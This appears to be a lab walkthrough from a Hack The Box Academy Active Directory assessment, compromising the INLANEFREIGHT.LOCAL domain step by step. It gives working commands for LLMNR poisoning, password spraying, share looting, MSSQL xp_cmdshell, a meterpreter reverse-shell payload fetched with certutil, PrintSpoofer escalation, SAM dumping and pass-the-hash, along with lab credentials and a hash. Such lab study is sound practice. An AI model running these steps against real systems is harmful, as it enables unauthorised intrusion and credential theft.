<aside> π―
We have A parrot machine into the Network and the Target here is searching for foothold and start Our Enums And attacks
</aside>
<aside> π―
after get into the network, i run responder -I ens224 to sniffing any foothold i found that a user called AB920 and get his hash and cracked it, so i have now a Domain Joined User Creds AB920:weasal
</aside>
<aside> π―
now trying to enum Users from credentials we found sudo crackmapexec smb 172.16.7.3 -u AB920 -p weasal --users
and got this svc_sccm , mssqlsvc and those are services accounts so letβs try kerbroasting
</aside>
<aside> π―
Checked Valid IPs β
ββ[htb-student@skills-par01]β[~]
ββββΌ $fping -asgq 172.16.7.3/23
172.16.7.3
172.16.7.50
172.16.7.60
172.16.7.240
Now login β
β[eu-academy-3]β[10.10.15.182]β[htb-ac-1729890@htb-q7fyafslq6]β[~]
ββββΌ [β
]$ proxychains evil-winrm -i 172.16.7.50 -u AB920 -p weasal
</aside>
<aside> π―
Make Usernames List
sudo crackmapexec smb 172.16.7.3 -u 'ab920' -p 'weasal' --users | tee usernames.txt
cat usernames.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt
Now trying to make Passwod Spray
kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt Welcome1

[email protected]:Welcome1
</aside>
<aside> π―
Now we have to Search about Config Files , so letβs checking Shares File
smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3

Checking Department Shares Share
smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares'

Now letβs get this file smbmap -u 'br086' -p 'Welcome1' -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R 'Department Shares' -A web.config
and found this Creds !
netdb:D@ta_bAse_adm1n!
</aside>
<aside> π―
login to this DB
mssqlclient.py inlanefreight/netdb:'D@ta_bAse_adm1n!'@172.16.7.60
SQL> EXEC xp_cmdshell 'whoami /priv'

then trying printnightmare CVE
#Generate the payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1335 -f exe -o shell.exe
#transfer the shell and printservices
xp_cmdshell "certutil.exe -urlcache -f <http://172.16.7.240:8000/PrintSpoofer.exe> C:\Users\Public\PrintSpoofer.exe"
xp_cmdshell "certutil.exe -urlcache -f <http://172.16.7.240:8000/shell.exe> C:\Users\Public\shell.exe"
#prepare MSFCONSOLE Listener
#run the payload
xp_cmdshell C:\Users\Public\PrintSpoofer.exe -c C:\Users\Public\shell.exe
now we have meterpreter seesion so letβs Upgarde our privielges
metepreter> load kiwi
metepreter> lsa_dump_sam
#get administrator hash then we can access by winrm
proxychains evil-winrm -i 172.16.7.60 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99
</aside>
<aside> π―
We can Enter using PSEXEC
use exploit/windows/smb/psexec
set lhost 172.16.7.240
set rhosts 172.16.7.50
set smbuser administrator
set smbpass 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
exploit
Shell
powershell
Now we wanna to upload Sharphound to gather data so, letβs host this file in our attack machine then upload it
certutil -urlcache -f <http://172.16.7.240:8080/SharpHound.exe> SharpHound.exe
then get the Zip File after SharpHound Finishs
</aside>